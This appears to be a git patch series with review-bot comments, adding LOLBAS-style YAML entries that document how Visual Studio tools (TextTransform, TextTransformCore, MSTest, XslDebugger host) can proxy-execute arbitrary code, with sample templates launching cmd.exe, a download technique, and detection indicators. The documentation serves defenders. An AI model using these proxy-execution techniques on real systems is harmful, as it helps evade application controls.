From 397503513c9efe0333c56661d8400f27092424e4 Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Fri, 3 Apr 2026 00:50:50 +0300
Subject: [PATCH 01/10] Add TextTransform.exe to OtherMSBinaries
---
yml/OtherMSBinaries/TextTransform.yml | 33 +++++++++++++++++++++++++++
1 file changed, 33 insertions(+)
create mode 100644 yml/OtherMSBinaries/TextTransform.yml
diff --git a/yml/OtherMSBinaries/TextTransform.yml b/yml/OtherMSBinaries/TextTransform.yml
new file mode 100644
index 00000000..5a554318
--- /dev/null
+++ b/yml/OtherMSBinaries/TextTransform.yml
@@ -0,0 +1,33 @@
+Name: TextTransform.exe
+Description: T4 Text Template transformation tool included with Visual Studio. Processes T4 template files (.tt) that can contain arbitrary C# or VB.NET code which executes during template processing.
+Author: Noam Pomerantz
+Created: 2026-04-03
+Commands:
+ - Command: TextTransform.exe -out {OUTPUT_FILE} {PATH:.tt}
+ Description: Processes a T4 template file (.tt) containing embedded C# code blocks. The C# code executes during template processing with full .NET Framework access.
+ Usecase: Execute arbitrary C# code by embedding it in a T4 template file. Can spawn processes, download files, access the filesystem, and perform any .NET operation.
+ Category: Execute
+ Privileges: User
+ MitreID: T1127
+ MitreLink: https://attack.mitre.org/techniques/T1127/
+ OperatingSystem: Windows 10, Windows 11
+Full_Path:
+ - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\TextTransform.exe
+ - Path: C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\TextTransform.exe
+ - Path: C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\IDE\TextTransform.exe
+Code_Sample:
+ - Code: |-
+ <#@ template language="C#" #>
+ <#@ import namespace="System.Diagnostics" #>
+ <#
+ Process.Start("cmd.exe");
+ #>
+Detection:
+ - IOC: TextTransform.exe process execution outside of a typical Visual Studio development context.
+ - IOC: TextTransform.exe processing .tt files from unusual directories such as %TEMP% or user profile folders.
+ - IOC: Unexpected child processes (e.g., cmd.exe, powershell.exe) spawning directly from TextTransform.exe.
+Resources:
+ - Link: https://learn.microsoft.com/en-us/visualstudio/modeling/code-generation-and-t4-text-templates
+Acknowledgement:
+ - Person: Noam Pomerantz
+ Handle: '@pumi96'
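Review bot: the first Detection IOC ("outside of a typical Visual Studio development context") gives a defender nothing concrete to key on; the Microsoft.XslDebugger.Host entry later in this series phrases the same idea as a parent-process check ("execution outside of devenv.exe parent process"), and that form would serve better here too. Two smaller points: `Full_Path` lists only the three VS 2022 editions while the Description says the tool is "included with Visual Studio" generally, so either state that only 2022 was verified or add the other paths once checked; and the file lacks the leading `---` document marker and carries a `MitreLink` key that the other new entries in this series do not have (patches 02 and 03 fix both), so those fixups belong squashed into this commit.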
From 48432a78582e6f53f05ac099de1edb696c0054ea Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Fri, 3 Apr 2026 00:57:08 +0300
Subject: [PATCH 02/10] Add metadata for TextTransform.exe
Added metadata for TextTransform.exe including name, description, author, and creation date.
---
yml/OtherMSBinaries/TextTransform.yml | 1 +
1 file changed, 1 insertion(+)
diff --git a/yml/OtherMSBinaries/TextTransform.yml b/yml/OtherMSBinaries/TextTransform.yml
index 5a554318..9d35a5ab 100644
--- a/yml/OtherMSBinaries/TextTransform.yml
+++ b/yml/OtherMSBinaries/TextTransform.yml
@@ -1,3 +1,4 @@
+---
Name: TextTransform.exe
Description: T4 Text Template transformation tool included with Visual Studio. Processes T4 template files (.tt) that can contain arbitrary C# or VB.NET code which executes during template processing.
Author: Noam Pomerantz
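Review bot: the commit body says name, description, author and creation date were added, but the hunk only inserts the `---` YAML document start marker; those four fields were already present in patch 01. Either reword the message to match the change or squash this into patch 01, where the marker should have been from the start.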
From 12b452f6692d2d0bdd3596d237ea574529c493bb Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Fri, 3 Apr 2026 01:01:20 +0300
Subject: [PATCH 03/10] Update TextTransform.yml
---
yml/OtherMSBinaries/TextTransform.yml | 1 -
1 file changed, 1 deletion(-)
diff --git a/yml/OtherMSBinaries/TextTransform.yml b/yml/OtherMSBinaries/TextTransform.yml
index 9d35a5ab..096bd4a1 100644
--- a/yml/OtherMSBinaries/TextTransform.yml
+++ b/yml/OtherMSBinaries/TextTransform.yml
@@ -10,7 +10,6 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1127
- MitreLink: https://attack.mitre.org/techniques/T1127/
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\TextTransform.exe
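Review bot: dropping `MitreLink` is the right call (none of the other entries in this series carry it, and `MitreID` alone identifies the technique), but the subject "Update TextTransform.yml" says nothing about that. A one-line fixup like this reads better squashed into patch 01, or given a subject that names the removed key.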
From b40da239592cb3294d396431acad2abe44f65d99 Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Fri, 3 Apr 2026 01:26:49 +0300
Subject: [PATCH 04/10] Add TextTransformCore.yml
Added configuration for TextTransformCore.exe.
---
yml/OtherMSBinaries/TextTransformCore.yml | 35 +++++++++++++++++++++++
1 file changed, 35 insertions(+)
create mode 100644 yml/OtherMSBinaries/TextTransformCore.yml
diff --git a/yml/OtherMSBinaries/TextTransformCore.yml b/yml/OtherMSBinaries/TextTransformCore.yml
new file mode 100644
index 00000000..96345e4c
--- /dev/null
+++ b/yml/OtherMSBinaries/TextTransformCore.yml
@@ -0,0 +1,35 @@
+---
+Name: TextTransformCore.exe
+Description: .NET Core T4 Text Template transformation tool included with Visual Studio. Processes T4 template files (.tt) that can contain arbitrary C# code which executes during template processing.
+Author: Noam Pomerantz
+Created: 2026-04-03
+Commands:
+ - Command: TextTransformCore.exe {PATH:.tt}
+ Description: Processes a T4 template file (.tt) containing embedded C# code blocks. The C# code executes during template processing with .NET Core runtime access.
+ Usecase: Execute arbitrary C# code by embedding it in a T4 template file. Can write files, access the filesystem, and perform .NET operations. Process.Start requires additional assembly references.
+ Category: Execute
+ Privileges: User
+ MitreID: T1127
+ OperatingSystem: Windows 10, Windows 11
+Full_Path:
+ - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\TextTransformCore.exe
+ - Path: C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\TextTransformCore.exe
+ - Path: C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\IDE\TextTransformCore.exe
+Code_Sample:
+ - Code: |-
+ <#@ template language="C#" #>
+ <#@ assembly name="System.Diagnostics.Process" #>
+ <#@ assembly name="System.ComponentModel.Primitives" #>
+ <#@ import namespace="System.Diagnostics" #>
+ <#
+ Process.Start("cmd.exe");
+ #>
+Detection:
+ - IOC: TextTransformCore.exe process execution outside of a typical Visual Studio development context.
+ - IOC: TextTransformCore.exe processing .tt files from unusual directories such as %TEMP% or user profile folders.
+ - IOC: Unexpected child processes (e.g., cmd.exe, powershell.exe) spawning directly from TextTransformCore.exe.
+Resources:
+ - Link: https://learn.microsoft.com/en-us/visualstudio/modeling/code-generation-and-t4-text-templates
+Acknowledgement:
+ - Person: Noam Pomerantz
+ Handle: '@pumi96'
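Review bot: the last sentence of the Usecase ("Process.Start requires additional assembly references") is implementation detail about the sample rather than a use case, and it reads as a caveat on what the tool can do; the Code_Sample already shows the two `<#@ assembly name="..." #>` directives that make `Process.Start` resolve on .NET Core, so move that remark into the command Description or drop it. Also, this Command has no `-out` option while the TextTransform.exe entry does; if the Core tool accepts `-out` as well, use the same shape for both entries, otherwise say where the generated output lands.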
From 9f6feb143fe9f13a7034a625e443158f0614bd33 Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Fri, 3 Apr 2026 02:22:48 +0300
Subject: [PATCH 05/10] Create MSTest.yml for MSTest.exe documentation
Added MSTest.yml to document the legacy test execution tool and its usage.
---
yml/OtherMSBinaries/MSTest.yml | 40 ++++++++++++++++++++++++++++++++++
1 file changed, 40 insertions(+)
create mode 100644 yml/OtherMSBinaries/MSTest.yml
diff --git a/yml/OtherMSBinaries/MSTest.yml b/yml/OtherMSBinaries/MSTest.yml
new file mode 100644
index 00000000..3b6d0d75
--- /dev/null
+++ b/yml/OtherMSBinaries/MSTest.yml
@@ -0,0 +1,40 @@
+---
+Name: MSTest.exe
+Description: Legacy Test Execution Command Line Tool included with Visual Studio. Loads and executes .NET test assemblies which can contain arbitrary code.
+Author: Noam Pomerantz
+Created: 2026-04-03
+Commands:
+ - Command: MSTest.exe /testcontainer:{PATH:.dll} /resultsfile:{OUTPUT_FILE}
+ Description: Loads a .NET assembly as a test container and executes all methods decorated with [TestMethod]. The test methods run with full .NET Framework access, allowing arbitrary code execution.
+ Usecase: Proxy execution of arbitrary .NET code by packaging it as a unit test DLL. A test runner executing attacker-controlled assemblies is unexpected outside a development context.
+ Category: Execute
+ Privileges: User
+ MitreID: T1218
+ OperatingSystem: Windows 10, Windows 11
+Full_Path:
+ - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\MSTest.exe
+ - Path: C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\MSTest.exe
+ - Path: C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\IDE\MSTest.exe
+Code_Sample:
+ - Code: |-
+ // Compile with: csc.exe /target:library /reference:"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\ReferenceAssemblies\v4.0\Microsoft.VisualStudio.QualityTools.UnitTestFramework.dll" /out:MaliciousTest.dll MaliciousTest.cs
+ using Microsoft.VisualStudio.TestTools.UnitTesting;
+ using System.Diagnostics;
+ [TestClass]
+ public class LolbasTest
+ {
+ [TestMethod]
+ public void Execute()
+ {
+ Process.Start("cmd.exe");
+ }
+ }
+Detection:
+ - IOC: MSTest.exe process execution outside of a typical Visual Studio development or CI/CD context.
+ - IOC: MSTest.exe loading test assemblies from unusual directories such as %TEMP% or user profile folders.
+ - IOC: Unexpected child processes (e.g., cmd.exe, powershell.exe) spawning directly from MSTest.exe.
+Resources:
+ - Link: https://learn.microsoft.com/en-us/visualstudio/test/walkthrough-using-a-configuration-file-to-define-a-data-source
+Acknowledgement:
+ - Person: Noam Pomerantz
+ Handle: '@pumi96'
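Review bot: `MitreID: T1218` is out of step with the rest of this series, which maps the Visual Studio tools to T1127 (Trusted Developer Utilities Proxy Execution); MSTest.exe is exactly such a developer utility, so T1127 looks like the better fit unless there is a specific reason for System Binary Proxy Execution here. The single Resources link points to a walkthrough on defining a test data source via a configuration file, which has nothing to do with `/testcontainer` execution; a reference covering the MSTest.exe command-line options would be more useful to a reader of this entry.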
From 7440f2cd411ff38098ba3e21362ae2d4c8c8cad1 Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Fri, 3 Apr 2026 02:24:16 +0300
Subject: [PATCH 06/10] Remove code sample from MSTest.yml
Removed code sample for MSTest from configuration.
---
yml/OtherMSBinaries/MSTest.yml | 14 --------------
1 file changed, 14 deletions(-)
diff --git a/yml/OtherMSBinaries/MSTest.yml b/yml/OtherMSBinaries/MSTest.yml
index 3b6d0d75..adeba364 100644
--- a/yml/OtherMSBinaries/MSTest.yml
+++ b/yml/OtherMSBinaries/MSTest.yml
@@ -15,20 +15,6 @@ Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\MSTest.exe
- Path: C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\MSTest.exe
- Path: C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\IDE\MSTest.exe
-Code_Sample:
- - Code: |-
- // Compile with: csc.exe /target:library /reference:"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\ReferenceAssemblies\v4.0\Microsoft.VisualStudio.QualityTools.UnitTestFramework.dll" /out:MaliciousTest.dll MaliciousTest.cs
- using Microsoft.VisualStudio.TestTools.UnitTesting;
- using System.Diagnostics;
- [TestClass]
- public class LolbasTest
- {
- [TestMethod]
- public void Execute()
- {
- Process.Start("cmd.exe");
- }
- }
Detection:
- IOC: MSTest.exe process execution outside of a typical Visual Studio development or CI/CD context.
- IOC: MSTest.exe loading test assemblies from unusual directories such as %TEMP% or user profile folders.
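Review bot: the sample is removed here without the message saying why, and patch 07 puts it back unchanged two minutes later; this commit adds nothing to the history and should be dropped when patches 05 through 07 are squashed into a single "Add MSTest.exe" commit.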
From f1b65fef3929018eddfd7257628bfedde598548a Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Fri, 3 Apr 2026 02:26:58 +0300
Subject: [PATCH 07/10] Refine description and add code sample for MSTest
Updated the description to use 'TestMethod attribute' instead of '[TestMethod]'. Added a code sample demonstrating malicious test execution.
---
yml/OtherMSBinaries/MSTest.yml | 16 +++++++++++++++-
1 file changed, 15 insertions(+), 1 deletion(-)
diff --git a/yml/OtherMSBinaries/MSTest.yml b/yml/OtherMSBinaries/MSTest.yml
index adeba364..0f74902e 100644
--- a/yml/OtherMSBinaries/MSTest.yml
+++ b/yml/OtherMSBinaries/MSTest.yml
@@ -5,7 +5,7 @@ Author: Noam Pomerantz
Created: 2026-04-03
Commands:
- Command: MSTest.exe /testcontainer:{PATH:.dll} /resultsfile:{OUTPUT_FILE}
- Description: Loads a .NET assembly as a test container and executes all methods decorated with [TestMethod]. The test methods run with full .NET Framework access, allowing arbitrary code execution.
+ Description: Loads a .NET assembly as a test container and executes all methods decorated with the TestMethod attribute. The test methods run with full .NET Framework access, allowing arbitrary code execution.
Usecase: Proxy execution of arbitrary .NET code by packaging it as a unit test DLL. A test runner executing attacker-controlled assemblies is unexpected outside a development context.
Category: Execute
Privileges: User
@@ -15,6 +15,20 @@ Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\MSTest.exe
- Path: C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\MSTest.exe
- Path: C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\IDE\MSTest.exe
+Code_Sample:
+ - Code: |-
+ // Compile with: csc.exe /target:library /reference:"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\ReferenceAssemblies\v4.0\Microsoft.VisualStudio.QualityTools.UnitTestFramework.dll" /out:MaliciousTest.dll MaliciousTest.cs
+ using Microsoft.VisualStudio.TestTools.UnitTesting;
+ using System.Diagnostics;
+ [TestClass]
+ public class LolbasTest
+ {
+ [TestMethod]
+ public void Execute()
+ {
+ Process.Start("cmd.exe");
+ }
+ }
Detection:
- IOC: MSTest.exe process execution outside of a typical Visual Studio development or CI/CD context.
- IOC: MSTest.exe loading test assemblies from unusual directories such as %TEMP% or user profile folders.
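Review bot: this reinstates byte-for-byte the block patch 06 deleted, so the remove/re-add pair is pure churn and 05 through 07 collapse to one commit. On the sample itself, the compile comment hard-codes the Community edition `ReferenceAssemblies` path while `Full_Path` lists Community, Professional and Enterprise; a note that the `/reference:` path varies by edition would save the reader a copy-paste failure. The `[TestMethod]` to "TestMethod attribute" wording change in the Description is fine.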
From 1980117eccef44f44221cacdf7da7ef561d68c01 Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Sun, 5 Apr 2026 15:56:14 +0300
Subject: [PATCH 08/10] Create Microsoft.XslDebugger.Host.yml
---
.../Microsoft.XslDebugger.Host.yml | 70 +++++++++++++++++++
1 file changed, 70 insertions(+)
create mode 100644 yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
diff --git a/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml b/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
new file mode 100644
index 00000000..4d6d875a
--- /dev/null
+++ b/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
@@ -0,0 +1,70 @@
+---
+Name: Microsoft.XslDebugger.Host.exe
+Description: XSLT Execution Utility included with Visual Studio for debugging XSLT transformations
+Author:
+Created: 2026-04-05
+Commands:
+ - Command: Microsoft.XslDebugger.Host.exe input.xml payload.xsl /enable:all
+ Description: Executes arbitrary C# code embedded in msxsl:script blocks within an XSLT stylesheet. The /enable:all flag enables inline script compilation and execution via the .NET XSLT engine. Can call Process.Start, WebClient, and any .NET Framework class.
+ Usecase: Execute arbitrary C# code and spawn processes through a Microsoft-signed XSLT debugger binary.
+ Category: Execute
+ Privileges: User
+ MitreID: T1220
+ OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: XSLT
+ - Command: Microsoft.XslDebugger.Host.exe input.xml download.xsl /enable:all
+ Description: Downloads files from arbitrary URLs using System.Net.WebClient embedded in an XSLT msxsl:script block. The XSLT file contains C# code that calls WebClient.DownloadFile() to save remote content to disk.
+ Usecase: Download files from a remote server using a Microsoft-signed XSLT debugger binary.
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Download: HTTP
+Full_Path:
+ - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Xml\Microsoft.XslDebugger.Host.exe
+ - Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\Community\Common7\IDE\Xml\Microsoft.XslDebugger.Host.exe
+ - Path: C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\Xml\Microsoft.XslDebugger.Host.exe
+ - Path: C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\IDE\Xml\Microsoft.XslDebugger.Host.exe
+Code_Sample:
+ - Code: |-
+
+ test
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+Detection:
+ - IOC: Microsoft.XslDebugger.Host.exe execution outside of devenv.exe parent process
+ - IOC: Microsoft.XslDebugger.Host.exe with /enable:all command-line argument
+ - IOC: Microsoft.XslDebugger.Host.exe spawning child processes (cmd.exe, powershell.exe)
+ - IOC: Microsoft.XslDebugger.Host.exe making outbound HTTP/HTTPS connections
+Resources:
+ - Link: https://learn.microsoft.com/en-us/dotnet/standard/data/xml/xslt-transformations
+ - Link: https://learn.microsoft.com/en-us/dotnet/standard/data/xml/script-blocks-using-msxsl-script
+Acknowledgement:
+ - Person: Noam
+ Handle: '@pumi96'
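Review bot: as shown here the Code_Sample block contains no XSLT at all, only the word `test` on an otherwise blank run of lines, yet the entry's whole point is the `msxsl:script` block the Commands describe; a working stylesheet (declaring the `msxsl` namespace and carrying a script element that calls `Process.Start` for the Execute command and `WebClient.DownloadFile()` for the Download command) is needed or the entry cannot be reproduced. Further: `Author:` is empty (patches 09 and 10 fix it and should be squashed here); the `Acknowledgement` `Person:` reads `Noam` where every other entry in the series uses the full name; the Commands use literal `input.xml payload.xsl` and `download.xsl` instead of the `{PATH:.xml}` / `{PATH:.xsl}` placeholders the TextTransform and MSTest entries use; the `Program Files (x86)` variant is listed only for the Community edition, so either add it for Professional and Enterprise or drop it; and the Description lacks the terminal period the other entries have.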
From 68f3ebcbc19e47184e353064fa8d046d741440a8 Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Sun, 5 Apr 2026 15:58:18 +0300
Subject: [PATCH 09/10] Add author information to Microsoft.XslDebugger.Host.yml
---
yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml b/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
index 4d6d875a..1d83f716 100644
--- a/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
+++ b/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
@@ -1,7 +1,7 @@
---
Name: Microsoft.XslDebugger.Host.exe
Description: XSLT Execution Utility included with Visual Studio for debugging XSLT transformations
-Author:
+Author: Noam
Created: 2026-04-05
Commands:
- Command: Microsoft.XslDebugger.Host.exe input.xml payload.xsl /enable:all
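Review bot: this only fills the `Author:` field that patch 08 left empty, and patch 10 changes the same line again a minute later; fold both into patch 08 so the entry lands complete in one commit rather than through two single-line fixups.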
From 9c735db6bfd317520dc4abf98e0f8d0e083c0931 Mon Sep 17 00:00:00 2001
From: Pumi96 <60677638+Pumi96@users.noreply.github.com>
Date: Sun, 5 Apr 2026 15:59:28 +0300
Subject: [PATCH 10/10] Update author name in Microsoft.XslDebugger.Host.yml
---
yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml b/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
index 1d83f716..27b80ab3 100644
--- a/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
+++ b/yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml
@@ -1,7 +1,7 @@
---
Name: Microsoft.XslDebugger.Host.exe
Description: XSLT Execution Utility included with Visual Studio for debugging XSLT transformations
-Author: Noam
+Author: Noam Pomerantz
Created: 2026-04-05
Commands:
- Command: Microsoft.XslDebugger.Host.exe input.xml payload.xsl /enable:all
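Review bot: with `Author:` now `Noam Pomerantz`, the `Acknowledgement` `Person: Noam` line added in patch 08 is the one remaining place in this file that disagrees with the other entries in the series; update it in this commit as well rather than leave it for yet another fixup.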